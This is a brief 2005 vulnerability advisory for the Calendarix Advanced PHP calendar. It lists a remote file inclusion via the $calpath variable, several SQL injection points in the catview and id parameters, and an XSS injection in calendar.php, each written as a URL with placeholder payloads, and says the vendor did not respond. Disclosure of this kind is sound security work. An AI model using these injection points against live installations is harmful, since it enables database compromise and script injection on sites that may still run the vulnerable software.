/*********************************************** * Advisorie : 01-0005-15 * title: multiple vulnerability * Software: Calendarix Advanced * Date: 28. April 2005 * Web: http://www.calendarix.com/ ************************************************/ - Affected software description: Webcalendar is a web software write in php y mysql - Expoit: Include line 16 admin/cal_admintop.php:include_once ($calpath."cal_utils.php"); xss and sql injection line 122 - 160 cal_day.php?op=day&date=2005-05-03&catview=1[sql]/* cal_pophols.php?id=999'[sql]/* line 23 calendar.php?op=cal&month=5&year=2'%3Ch1%3DarkBicho005&catview=1 line 194 - 196 cal_week.php?op=week&catview= 999'[sql]/* line 34 - 39 cal_cat.php?op=cats&catview=999'[sql]*/ - How to fix: Vendor no responds - Credits: DarkBicho Email: darkbicho@xxxxxxxxx Web: http://www.swp-scene.org - Grettings: "A mi Team SWP" " Viva el Peru Carajo" -- - - - - - - - - - - - - - - - - - - - - - - - - - Miguel Sumaran (DarkBicho) webpage: http://www.darkbicho.tk/ Team : http://www.swp-scene.org/ Made in Peru - - - - - - - - - - - - - - - - - - - - - - - - -
